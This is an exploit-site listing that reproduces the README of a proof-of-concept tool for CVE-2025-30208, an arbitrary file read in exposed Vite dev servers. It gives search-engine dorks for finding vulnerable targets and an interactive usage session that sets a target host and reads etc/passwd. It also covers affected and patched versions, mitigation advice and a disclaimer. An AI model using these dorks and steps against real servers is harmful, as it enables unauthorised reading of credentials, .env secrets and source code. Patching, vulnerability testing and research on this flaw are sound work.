Exploit for CVE-2025-30208

Name: Exploit for CVE-2025-30208
Rating: 5 (12 reviews)
2025-06-27 | CVSS 5.3
## https://sploitus.com/exploit?id=A75E1BF9-2725-580E-A06B-0892E211AEB1
# CVE-2025-30208

![Vulnerability](https://img.shields.io/badge/Vulnerability-Arbitrary%20File%20Read-red)
![Vite](https://img.shields.io/badge/Vite-5.x%2C%206.x-blue)
![Status](https://img.shields.io/badge/Status-Exploit%20PoC-brightgreen)

---

> **CVE-2025-30208** — Vite Arbitrary File Read Vulnerability

---
---
```bash
Finding Targets
To find potential targets, use Fofa (similar to Shodan.io):

Fofa Dork: app="Vite-App"
Shodan.io: app="Vite"
hunter.how: product.name="Vite"
```
## 📑 Table of Contents

- [Overview](#overview)
- [Impact](#impact)
- [Affected Versions](#affected-versions)
- [Patched Versions](#patched-versions)
- [How to Test](#how-to-test)
- [Example Usage](#example-usage)
- [Mitigation](#mitigation)
- [References](#references)

---

## 📝 Overview

**CVE-2025-30208** is an **Arbitrary File Read** vulnerability in multiple versions of the Vite Development Server. Remote attackers can read any file on the server by sending specially crafted HTTP requests, if the Vite dev server is exposed to the network (e.g., using `--host` or configuring `server.host`).

> **Type:** Arbitrary File Read  
> **CVE:** CVE-2025-30208  
> **Component:** Vite Dev Server

---

## 🚨 Impact

- Read sensitive files such as `/etc/passwd`, `.env`, source code, or configuration files.
- May lead to credential theft, information disclosure, or further attacks.

---

## 📦 Affected Versions

```
6.2.0 <= Vite <= 6.2.2
6.1.0 <= Vite <= 6.1.1
6.0.0 <= Vite <= 6.0.11
5.0.0 <= Vite <= 5.4.14
Vite <= 4.5.9
```

> ⚠️ **Note:** Exploitable only if the Vite dev server is accessible from the network (e.g., started with `vite --host`).

---

## 🛡️ Patched Versions

```
Vite >= 6.2.3
6.1.2 <= Vite < 6.2.0
6.0.12 <= Vite < 6.1.0
5.4.15 <= Vite < 6.0.0
4.5.10 <= Vite < 5.0.0
```

---

## 🧪 How to Test

This repository provides a script (`CVE-2025-30208.py`) to test if a target Vite server is vulnerable.

### 1. Install Dependencies

```bash
pip3 install -r requirements.txt
```

### 2. Run the Script

```bash
python3 CVE-2025-30208.py
```

### 3. Set Target Options

- `set RHOST <target IP or domain>`
- `set RPORT <Vite dev server port>`
- `set COMMAND <file path to read, e.g., etc/passwd>`

### 4. Run the Exploit

- Use the `run` or `exploit` command to test the target.
- If vulnerable content is found, use the `pull` command to save the leaked data as HTML or JSON.

---

## 💻 Example Usage

```shell
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 5173
CVE-2025-30208 > set COMMAND etc/passwd
CVE-2025-30208 > run
CVE-2025-30208 > pull
```

---

## 🛡️ Mitigation

- **Upgrade** Vite to a patched version as listed above.
- **Do not expose** the Vite dev server to public or untrusted networks.
- **Restrict access** using firewalls or reverse proxies.

---
## ⚠️ Disclaimer
This project is created for educational and research purposes only. The author is not responsible for any misuse of this tool or information provided herein.

Using this software against systems without explicit permission is illegal and strictly prohibited. Always ensure you have written authorization before performing any security testing.

By using this repository, you agree to comply with all applicable local, state, national, and international laws.
## 📚 References

- [Vite Official Repository](https://github.com/vitejs/vite)
- [National Vulnerability Database (NVD)](https://nvd.nist.gov/)
- [GitHub Advisory Database](https://github.com/advisories)